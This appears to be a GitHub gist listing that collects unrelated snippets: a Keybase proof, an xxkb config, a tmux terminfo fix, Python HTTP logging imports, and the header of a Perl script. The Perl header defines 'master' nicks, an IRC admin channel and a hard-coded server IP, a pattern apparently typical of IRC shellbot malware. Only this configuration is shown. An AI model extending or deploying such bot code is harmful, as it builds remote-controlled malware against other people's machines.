I hereby claim:
- I am sv0 on github.
- I am sv0 (https://keybase.io/sv0) on keybase.
- I have a public key whose fingerprint is 294D B01D AAB5 1C84 5C04 F420 3D93 212C DDC8 2CD6
To claim this, I am signing this object:
| # http://manpages.ubuntu.com/manpages/natty/man1/xxkb.1.html | |
| XXkb.image.path: .config/xxkb | |
| XXkb.group.base: 1 | |
| XXkb.group.alt: 2 | |
| XXkb.mainwindow.type: tray | |
| XXkb.mainwindow.enable: yes | |
| XXkb.mainwindow.appicon: yes | |
| XXkb.mainwindow.border.width: 1 |
I hereby claim:
To claim this, I am signing this object:
If tmux fails with an error terminal open failed: missing or unsuitable terminal: rxvt-unicode-256color
log in to your remote host and create .terminfo/r in your home directory:
mkdir -p ~/.terminfo/r
copy terminal information file to remote machine:
scp /usr/share/terminfo/r/rxvt-unicode* remote.host:~/.terminfo/r/
| import logging | |
| import contextlib | |
| try: | |
| from http.client import HTTPConnection # py3 # noqa | |
| except ImportError: | |
| from httplib import HTTPConnection # py2 # noqa | |
| # logger = logging.getLogger(__name__) |
| #!/usr/bin/perl | |
| my @mast3rs = ("z","w","x"); | |
| my @hostauth = ("localhost"); | |
| my @admchan=("#ssh"); | |
| my @server = ("91.191.19.112"); | |
| $servidor= $server[rand scalar @server] unless $servidor; | |